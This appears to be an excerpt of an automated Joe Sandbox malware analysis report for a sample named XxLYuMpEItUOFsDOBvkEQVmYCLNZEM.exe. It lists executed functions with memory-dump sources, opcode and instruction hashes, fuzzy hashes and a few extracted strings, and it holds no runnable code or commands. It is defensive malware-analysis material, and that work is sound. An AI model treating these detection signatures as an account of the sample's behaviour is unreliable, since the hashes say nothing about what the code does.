Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3087673938.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9be90000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4eec3d4080f0b486176db7363fed896a223c67deae6c084d49d25728c38221
Instruction ID: 2045e4b626e0badf5a55c48a4728920f5c087f9ba200363c8d9c485028b8322a
Opcode Fuzzy Hash: 7c4eec3d4080f0b486176db7363fed896a223c67deae6c084d49d25728c38221
Instruction Fuzzy Hash: 3AD0C910F0F64FA5F23946D142302BA259C9F41700F6B007DC09F418F2CD2E7B096603

Function 00007FFD9BAA17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06f07cbd7d95297375d93545331258401dc486fe2f6ae76d9dd932961aee914
Instruction ID: 50c4d91968f16bcfd0d6c79b5af6316bf552892e196b2e07acd221fa445c76c1
Opcode Fuzzy Hash: f06f07cbd7d95297375d93545331258401dc486fe2f6ae76d9dd932961aee914
Instruction Fuzzy Hash: C6C04C01F1CC5A5AF25E6714482167D08439F54718F598178E21EC63DECD6C6A0346CA

Function 00007FFD9BFC6CC8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3091863627.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9bfc0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9063a98d7a5d1555920a297b7ff764108d735ec7cf34d6130fd4b3d7575f6cd6
Instruction ID: 90e50968554b1a32ea1229102e19cd15b3ae4d11dcb4fd56268733c139f4b10f
Opcode Fuzzy Hash: 9063a98d7a5d1555920a297b7ff764108d735ec7cf34d6130fd4b3d7575f6cd6
Instruction Fuzzy Hash: 27B09B20D4774D45D62B35710D9145035505F46145FC603A5DC4448166D65F57D54652

Function 00007FFD9BAA06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction ID: 6834341f556406163c3317afcc966b8d6255fda7248770edeb6deafc77d47d3f
Opcode Fuzzy Hash: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction Fuzzy Hash: 4CB01200D5B40F01E43433FB0C9206874415B84604FC20070D40D8019198CD26990267

Function 00007FFD9BE9AA8F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3087673938.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9be90000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa9ff9d0d09a3abcbde029cf388cd04e481ed43028f74d36663cc7efb283d3b
Instruction ID: 1d53bc36cca6afe5384ec8d6744085220b868949d3a33fe3199c4338920afad9
Opcode Fuzzy Hash: ffa9ff9d0d09a3abcbde029cf388cd04e481ed43028f74d36663cc7efb283d3b
Instruction Fuzzy Hash: CFC04844F0F28A6BEB3519F00AA107C26852F56204B961672E15A9A1F3E88D6A0A5222

Function 00007FFD9BAC2820 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3077388012.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9bac1000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65fe1b534c0f0b6e26d026d5d40dbc2d3bc3e7cd0d725cd9cedb24ec66de3ce
Instruction ID: 9d26db8d566b7d986bc06b24ebb53773251a44d58ea367df17b6c8781394f037
Opcode Fuzzy Hash: f65fe1b534c0f0b6e26d026d5d40dbc2d3bc3e7cd0d725cd9cedb24ec66de3ce
Instruction Fuzzy Hash: 24A00214D9780F01D81C32FA5D9709478515B89114FC61569E90CC0696E8CF16E902A3

Function 00007FFD9BE95BD1 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.3087673938.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9be90000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229641a8dd5b9c340033c8c539cbf384336a1a518d7c6fc2433b8c8da009c047
Instruction ID: 91738f75a528a3072c46d1a4355e20c0bd2dc4a7a5da3ca0621674ec2ae1e37a
Opcode Fuzzy Hash: 229641a8dd5b9c340033c8c539cbf384336a1a518d7c6fc2433b8c8da009c047
Instruction Fuzzy Hash: FAB01200F0E30F83F53010F004B407C00C40F06344AB60630D10B455E3FE4D3A0C1260

Analysis Process: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exePID: 416, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAD0D4C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

5X_H, xrefs: 00007FFD9BAD0DF3

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 1c74c24eab0bd1cbab97a45d31f1a5b76a84242961f2da667b3d70951bd8b93e
Instruction ID: 759f410ec178907ceb3f0ca0a0d7f9cc373f659a82eabbb46554043a8ae79814
Opcode Fuzzy Hash: 1c74c24eab0bd1cbab97a45d31f1a5b76a84242961f2da667b3d70951bd8b93e
Instruction Fuzzy Hash: 25911675A19A8D4FE758DB6888757A87FE0FF99318F0102BED009D72D2DBB81401C740

Function 00007FFD9BAD0B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAD0B46
c9, xrefs: 00007FFD9BAD0B56
!k9, xrefs: 00007FFD9BAD0B4E

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 8047d700b4829e9f08fd1e5fe2866a91b355dbcf0c3be0842e1bf273393a4ccb
Instruction ID: 1965e92c657b11a75ed471c78a154b8b382e4a346ab2d411145ad64a580652d3
Opcode Fuzzy Hash: 8047d700b4829e9f08fd1e5fe2866a91b355dbcf0c3be0842e1bf273393a4ccb
Instruction Fuzzy Hash: B501442736A94A8BC302AB7DF8910E87B50EAC3132B9502BBC444CB1A2D211185FC7D1

Function 00007FFD9BAD08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c93590b6734bb25b1c97ce19b9d498ebcd8d8debeaacf5020b3af0e33869f6
Instruction ID: 0e526979909de7a15b378cb53a18c5fc8213419c8ea45277b3553b8bb2f276b9
Opcode Fuzzy Hash: 95c93590b6734bb25b1c97ce19b9d498ebcd8d8debeaacf5020b3af0e33869f6
Instruction Fuzzy Hash: 0F31063130D9194FDB68EA5CE88A9B977D0EF9932130602BBE48AC7166D951AC8287C5

Function 00007FFD9BAD0998 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256614c1d076d69a086d0d3ba9cd7d312d42be01d6cd406742d5c75a8da1f062
Instruction ID: 113ed5a817e2bfe639fb20564e85e554df625a9c4180400dc9cc5dc483913eb4
Opcode Fuzzy Hash: 256614c1d076d69a086d0d3ba9cd7d312d42be01d6cd406742d5c75a8da1f062
Instruction Fuzzy Hash: 1631F620B1D90D0FE7A8F7AC94AAB7936D6EF98325B4101B9E44EC33E7DD18AD418345

Function 00007FFD9BAD095D Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8997d5ad1bae24a1a31db4003cfb5d3b89f6f75845da8d180984e70084ea06a
Instruction ID: cad3537b26e433163e8d331a8501853de87cf8ccad151a6bbf7f4bfc9da011f8
Opcode Fuzzy Hash: b8997d5ad1bae24a1a31db4003cfb5d3b89f6f75845da8d180984e70084ea06a
Instruction Fuzzy Hash: E2310C21B0D51D0FE768F76CA4A66F873C1DF9832AB1402BAE40EC71E7CD18A8418284

Function 00007FFD9BAD0960 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 467964231a05e9600407c7293f6b32c46986395a4a2d42cd516a8c7bc53cd29b
Instruction ID: 3a8b175d9b9baebaad7f596c216eb760ead60e188597e0e985d7b35e894bec41
Opcode Fuzzy Hash: 467964231a05e9600407c7293f6b32c46986395a4a2d42cd516a8c7bc53cd29b
Instruction Fuzzy Hash: E731FD11B0D51D0FE768F7ACA466AF873C5DF9832AB1402BAE40EC72E7DD1CAC418285

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3780bb59b096bccbbb921bc835ce1bbb1a986bb5b276998683106136e607fad0
Instruction ID: 6fb4804e207da2d36b17261ba3c4106e906e955612653489d99639062de796d8
Opcode Fuzzy Hash: 3780bb59b096bccbbb921bc835ce1bbb1a986bb5b276998683106136e607fad0
Instruction Fuzzy Hash: 9821F731A0D28D8FE731DBA888752EC7FA0EF92325F5542B7D0888B1E2D5782645C745

Function 00007FFD9BAD1DD2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd49decae1629fbbe8f3828dc0290e47bbdb936682e5516d09359a66d988529
Instruction ID: b4856d0ad741462176630acfdcc43eb10a264208c4809a59a267988e8b332581
Opcode Fuzzy Hash: 6fd49decae1629fbbe8f3828dc0290e47bbdb936682e5516d09359a66d988529
Instruction Fuzzy Hash: B0116632B0D50D4EF7B4A758D8656F87392EFD4320F5203BBD50EC31B2DE696A818645

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4cad6195d7cef33575979abb8184dd45f718bef3c38da5f99e3674fb0dc4d1
Instruction ID: 22e8ffffc8c592a9b15adca2bb0648c51fccaae0658762c76607ed4a20139c2a
Opcode Fuzzy Hash: ed4cad6195d7cef33575979abb8184dd45f718bef3c38da5f99e3674fb0dc4d1
Instruction Fuzzy Hash: 2511A335A0D68C8FE722DBA898612DD7FB0EF92211F4646B7C084DB1A2D5741605C781

Function 00007FFD9BAD57D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf064196cd4599aeb2da0e08e58b77ea37c3cf595749df43a8a72b31400cd1e
Instruction ID: 7f00fecd69c204514ce582a284232823c5b31124129fa76995ac0a1bd71ab437
Opcode Fuzzy Hash: edf064196cd4599aeb2da0e08e58b77ea37c3cf595749df43a8a72b31400cd1e
Instruction Fuzzy Hash: 9D011211F1A91D4AFBB4A7A8807427C21D2EFE4714F564375E80DD32F2ECAC6E028245

Function 00007FFD9BAD0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75648ee853df95fb1322f3085824d26348042334306b0c798f3ae129d18ede5
Instruction ID: bdf117c7748f310f90ce5fc8344bd554ad16e9ba0120b51470fac3299a9218f6
Opcode Fuzzy Hash: d75648ee853df95fb1322f3085824d26348042334306b0c798f3ae129d18ede5
Instruction Fuzzy Hash: 9501C435A0E78C8FE722DBA8C8602DD7FB0EF52311F4646E7D084DB2A2D5341648CB81

Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ac4598ec39ed2c1aa18c41130f2c23646a10321e3ca40f48b3d07007cd537f
Instruction ID: 8e0852767cf8a13dd71c8ff961e94ea6cf3e95abf248a80d89b6cc9866cdb579
Opcode Fuzzy Hash: 29ac4598ec39ed2c1aa18c41130f2c23646a10321e3ca40f48b3d07007cd537f
Instruction Fuzzy Hash: 7401B535A0E38C8FD722DB64C8602DD7FB0EF42314F5542E7D084DB1A2D5345644CB41

Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5285c79152c5d93438f4231f2600e36803bc5d402493b8529691c6493ce293d3
Instruction ID: 31f776a50dce9ca2e7ade117e26e3e7f2efc1eb2d8ef34d4187a399dbc33fda8
Opcode Fuzzy Hash: 5285c79152c5d93438f4231f2600e36803bc5d402493b8529691c6493ce293d3
Instruction Fuzzy Hash: 5A018F35A0E3888FE722DBA488642DD7FB0AF52314F5542E7D494DB2A2D6785A44CB41

Function 00007FFD9BAD1E30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction ID: a59353685126148dcddc0bbde17bb0e8e3a814a8793ac6cad044506b42dcc2b7
Opcode Fuzzy Hash: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction Fuzzy Hash: 1DF01D31B0940E8AEB74AB84C8647F87261EB94310F1603BAC40ED31A6DEB86AC18B44

Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15182d0a5d858da7dd446179fee734cbabbe19a0e6fbd589d31990fe06e4d968
Instruction ID: e5b4f26cc63d197476c9890994cd9348ceb799d56ce9bfd0abdb68771c74f89e
Opcode Fuzzy Hash: 15182d0a5d858da7dd446179fee734cbabbe19a0e6fbd589d31990fe06e4d968
Instruction Fuzzy Hash: C8F0E53525A644CFC702DB38D8A54D47B60EF43214B9A11EAC489D7572C225585ECB41

Function 00007FFD9BAD6000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b825997a4d7567090b8459722cf64811fd5424df023d62ad44361242974fee
Instruction ID: 10acc9c2f53447c6a2663a378d07c7ef991dcbb1757699e2bd309373d25707f9
Opcode Fuzzy Hash: 37b825997a4d7567090b8459722cf64811fd5424df023d62ad44361242974fee
Instruction Fuzzy Hash: F4F02234518A18CFCB59DB48C8A8AA9B7F1FBA8305F110199D04AEB260DB35AA44CF45

Function 00007FFD9BAD6FE4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction ID: f8d88b3e33a615b6fabaaf22764653fd20da48f54749421204dcf4d329b9ac4a
Opcode Fuzzy Hash: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction Fuzzy Hash: 18E01220F0D41A46FBB4A344D8A07AD62A1EBD4310F1551B9E94EE33D1DD78AF85C705

Function 00007FFD9BAD06AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction ID: 424707ac1445df5c3899136f68131aae2cfa5aa5ad3be23bc630083b5a3256cd
Opcode Fuzzy Hash: e7a89266bc6c349abe8623a3e9f40865e8727d18f73a71cfd495ce5108998772
Instruction Fuzzy Hash: 75C08C04F0F50F00E43033EF18360ACB1008BC8A24FD30332D00C800B19CCD22C6814E

Function 00007FFD9BAD0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction ID: 6f3b5b6b3c070ccb7915e4afb2b6b313bd8c2f0e64220356613caa9e25d7cb5c
Opcode Fuzzy Hash: 0a818d8f5a13bea227cbfce387edc6cb0775a053b758b04d5d8255854f9de825
Instruction Fuzzy Hash: A2C08C306118088FC900E73CC884A0432A0FB4D210BC20190E00EC7170E25A9C81C700

Function 00007FFD9BAD64E2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction ID: 8c4ecd2f0a98f43a6edddd43753b1a4898f96326a0ed011330431d6aa75d50bc
Opcode Fuzzy Hash: 985ccd842eeba2e927bda86e28c7a0b2a5877714eacd2325e29cac9a44df03d8
Instruction Fuzzy Hash: 90D01271F0E55A81FA3817D094711BE10919FA0310F3B1376E91E1E1F29CEE6F029551

Function 00007FFD9BAD17B6 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed3e801b0a09c66003bd39fa61f1ee6cc225ecd35278a6246b50eb43f4f0d28
Instruction ID: 11734997b643104b74e6ad475476e9570adf5fd437d9cdcde413136c676c6ec5
Opcode Fuzzy Hash: 8ed3e801b0a09c66003bd39fa61f1ee6cc225ecd35278a6246b50eb43f4f0d28
Instruction Fuzzy Hash: E7C04C01F1C81A0BE35A6714442567D0C439F9471CF558274F11E863DEDD6C6A0306CA

Function 00007FFD9BAD06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2299977398.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bad0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction ID: 02648c1f3720dc5291255e35d1734688000a2bcd5f0addd84f21f0b480742078
Opcode Fuzzy Hash: 34500ccf8df30341d9b505b43e3b9e90e99dadbd9c7071bb36cb0bc76043d124
Instruction Fuzzy Hash: 67B01200D5B40F00E43433FB0C6606870409BC8104FC20270D40D8019198CD12950246

Analysis Process: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exePID: 1704, Parent PID: 8164COMMON

Executed Functions

Function 00007FFD9BAA0D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: 13a32cd496589b866cffde16de35b218bebf8c6d7dce834a8a1bf9adce0be0ba
Instruction ID: b1c1a7a358263ffedc8301324df0c64c49da2493bd2aab424916e75641de64b1
Opcode Fuzzy Hash: 13a32cd496589b866cffde16de35b218bebf8c6d7dce834a8a1bf9adce0be0ba
Instruction Fuzzy Hash: EE911571A19A8D4FE799DF6888657A87FE1FF99310F4102BED00DD72E6DBB818148740

Function 00007FFD9BAA08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9457acc0b1e831a917c10d91a66d5f86ef3e44c69133cc1e5137baf13b66cda
Instruction ID: 27c2224a381a6b229b7bfbacd198f61ac46cdc5d6c47526c4f74ec243a9e28e3
Opcode Fuzzy Hash: e9457acc0b1e831a917c10d91a66d5f86ef3e44c69133cc1e5137baf13b66cda
Instruction Fuzzy Hash: A531453130D8184FE768EB5CE88A9B977D1EF5932130502BBE48AC7176ED51AC8287C5

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b51bde01628fb2a71fedd3471529af52455b5dcbeb513e93994ab24856ae1c
Instruction ID: 5ca0a1753b8022fd45bd7f543f1cd667acde3ea337f339090dbc17296f576523
Opcode Fuzzy Hash: f6b51bde01628fb2a71fedd3471529af52455b5dcbeb513e93994ab24856ae1c
Instruction Fuzzy Hash: 57310520B1D91E1FE798FB6C94BAA7972C2EF99321F4001B9E44EC33E7DD58AC418645

Function 00007FFD9BAA095D Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2257927729.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baa0000_XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2693cea84d509b9a20e44fff395018c7384362b487dc576c9f725fa84ac0289
Instruction ID: d2f1fb40e942e5bb660bbe9c26986c432b748a8e23e2bc14fd07b7ab1f85448f
Opcode Fuzzy Hash: a2693cea84d509b9a20e44fff395018c7384362b487dc576c9f725fa84ac0289
